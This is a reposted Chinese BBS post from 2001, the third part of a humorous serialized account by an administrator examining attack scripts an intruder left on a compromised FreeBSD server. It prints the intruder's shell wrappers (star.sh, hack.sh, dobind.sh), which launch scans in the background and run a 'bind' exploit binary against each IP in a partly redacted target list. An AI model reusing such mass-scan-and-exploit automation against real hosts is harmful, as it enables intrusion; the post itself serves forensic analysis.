大战黑客传之军情刺探

  发信人: melodies (明天就做窝), 信区: FreeBSD标 题: 大战黑客纪实-3(转)发信站: BBS 水木清华站 (Sun Jul 1 21:01:33 2001)文章出处:北邮BBS 作者 clubk (快乐草包) 看板 FreeBSD 标题 大战黑客记实(3) 时间 Sun Apr 15 00:33:04 2001———————————————————————————————————————(续)话说我等携了那些怪异官兵的全部资料回到大本营细细审问……首先是那些sh门下的,,他们没有什么保密纪律可言, 一下就都招了供词如下:hack.sh: //当然了, 这个家伙的名字就够吸引人的#!/bin/sh# hach.sh, by xxxxxx@263.net, xx-xx, xxxxcleartail -f hosts.log | while read TARGETdo./dobind.sh $TARGETdone############## End of hach.sh原来只是个帮凶, 从hosts.log读出些东西来交给dobind.sh来处理再看dobind.sh是何方神圣:#!/bin/sh# dobind.sh, by xxxxxx@263.net, xx-xx, xxxx/bind $1 >/dev/null 2>>/dev/null3>>/dev/null./scan $ADDRESSdone############## End of scan.sh最后一个是star.sh看来是他们的头儿:#!/bin/sh# star.sh, by xxxxxx@263.net, xx-xx, xxxx# Let’s go!rm -rf bindname.logtouch bindname.lognohup ./scan.sh >>/dev/null &nohup ./hack.sh >>/dev/null &############## End of star.sh好吗, 看起来这可不是一个一般的江湖混混早已取得系统的最高权限, 并在此安排了几个euid=root的”鼹鼠”八成是一个黑道高手, 至少从他的这几个手下的水平来看是这样不过奇怪的事怎么他没有悄悄换掉营中的几个心腹兵丁(ps, ls, etc)让我们很容易的找到了他的蛛丝马迹,那些躲在器械房(/dev)的可疑官兵也无所遁形最后还有一些其他相关文件要看:比如上面dobind.sh用到的hosts.log:xxx.49.6.182xxx.49.8.196xxx.49.9.204xxx.49.12.20xxx.4.143.132xxx.4.145.100xxx.4.146.124xxx.4.149.80xxx.4.158.110xxx.4.158.160xxx.4.160.28……(处于安全的考虑, 此处隐去了地址的最高段)全是江湖上的各个门派的所在(IP地址)….然后, 黑客打发在hack.sh中逐个取出地址打发手下bind.sh对付他们去了这个hosts.log从哪里来的呢?从star.sh看来, 只有scan.sh来做这件事了那么就要看scan.sh调遣的兵丁rundb和scan了。可是这两个都是ELF 派的,铁齿钢牙, 嘴不好撬啊….(未完待续)’人生就像一杯没有加糖的咖啡,喝起来是苦涩的,

大战黑客传之军情刺探

相关文章:

你感兴趣的文章:

标签云: